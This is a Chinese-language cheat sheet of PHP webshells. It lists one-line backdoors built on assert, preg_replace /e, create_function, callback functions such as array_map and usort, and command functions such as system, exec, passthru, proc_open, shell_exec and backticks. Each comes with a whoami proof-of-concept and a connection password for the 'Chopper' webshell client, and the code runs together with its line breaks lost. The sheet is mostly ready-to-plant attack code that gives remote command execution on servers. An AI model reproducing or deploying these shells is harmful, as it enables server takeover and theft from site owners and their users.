php代码执行与命令执行

#assert函数是直接将传入的参数当成PHP代码直接，不需要以分号结尾，当然你加上也可以。#命令執行：cmd=system(whoami)#菜刀连接密码：cmd<?php @assert($_POST['cmd'])?>

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )?>搜索subject中匹配pattern的部分， 以replacement进行替换。preg_replace()函数原本是执行一个正则表达式的搜索和替换，但因为存在危险的/e修饰符，使 preg_replace() 将 replacement 参数当作 PHP 代码 <?php //?cmd=phpinfo()  通过用户可控的传参拿到权限@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");//直接不用传参也可以输出phpinfopreg_replace("/test/e","phpinfo();","jutest test"); ?>

<?php#创建匿名函数执行代码#将传入的参数作为数组的第一个值传递给assert函数$func =create_function('',$_POST['cmd']);$func();poc#cmd=system(whoami)#菜刀连接密码：cmd?>这里是通过 POST传参，因为匿名函数接收POST传参

<?php$func=$_GET['func'];$cmd=$_POST['cmd'];$array[0]=$cmd;$new_array=array_map($func,$array);echo $new_array;//POC#用回调函数过滤数组中的元素：array_filter(数组,函数)#命令执行func=system&cmd=whoami#菜刀连接http://localhost/123.php?func=assert  密码cmd?>函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新值的数组。回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致

#传入的参数作为assert函数的参数#cmd=system(whoami)#菜刀连接密码：cmcall_user_func("assert",$_POST['cmd']);

#将传入的参数作为数组的第一个值传递给assert函数#cmd=system(whoami)#菜刀连接密码：cmd$cmd=$_POST['cmd'];$array[0]=$cmd;call_user_func_array("assert",$array);

#用回调函数过滤数组中的元素：array_filter(数组,函数)#命令执行func=system&cmd=whoami#菜刀连接http://localhost/123.php?func=assert  密码cmd$cmd=$_POST['cmd'];$array1=array($cmd);$func =$_GET['func'];array_filter($array1,$func);

#php环境 5.4.45以下版本均不可以使用#php环境  5.4.45版本开始存在 到php环境 5.6.27版本均存在，到 php 7.0版本就不存在了#uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。usort($_GET,'asse'.'rt');// poc#命令执行：http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);#菜刀连接：http://localhost/123.php?1=1+1&2=eval($_POST[cmd])   密码：cmd

#exec(命令，以数组形式保存结果，命令执行的状态码)#可执行，但需要加echo才能显示结果<?php$a=$_POST['cmd']; if(function_exists('exec')){      echo "<pre>";    exec($a,$b);    echo "</br>";    print_r($b);    echo "</pre>";}?>

#passthru函数可执行并直接显示结果<?php$a=$_POST['cmd'];if(function_exists('passthru')){    echo "<pre>";    passthru($a);    echo "</pre>";}?>

#执行一个命令，并且打开用输入输出的文件指针<?php$command=$_POST['cmd'];if(function_exists('proc_open')){    $descriptorspec = array(            1 => array("pipe", "w"),  // stdout is a pipe that the child will write to            );    $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'    if(is_resource($handle))    {        if(function_exists('fread') && function_exists('feof'))        {            echo "<pre>";            while(!feof($pipes[1]))            {                echo fread($pipes[1], 1024);                    }            echo "</pre>";        }        else if(function_exists('fgets') && function_exists('feof'))        {            echo "<pre>";            while(!feof($pipes[1]))            {                       echo fgets($pipes[1],1024);            }            echo "<pre>";        }    }    #pclose($handle);}else{    echo 'GG';}?>

#shell_exec函数可执行但需要加echo才能显示结果<?php$a=$_POST['cmd'];if(function_exists('system')){    echo "<pre>";   echo shell_exec($a);    echo "</pre>";}?>

#system函数可执行并直接显示结果<?php$a=$_POST['cmd'];if(function_exists('system')){    echo "<pre>";    system($a);    echo "</pre>";}?>

#【反引号命令执行】#通过shell 的环境执行命令，并且完整的输出以字符串的方式返回//可执行并直接显示结果,反引号，波浪键。//shell_exec() 函数实际上仅是反撇号 (`) 操作符的变体//所以如果把shell_exec()函数禁用了，反撇号 (`)也是执行不了命令的。<?php$cmd=$_POST['cmd'];echo "<pre>";echo `$cmd`;?>

//注意，这个只显示结果的第一行，因此基本只能执行whoami//ob_start：打开缓冲区,需要system函数开启$a = 'system';ob_start($a);echo "$_POST[cmd]";ob_end_flush();echo "</pre>";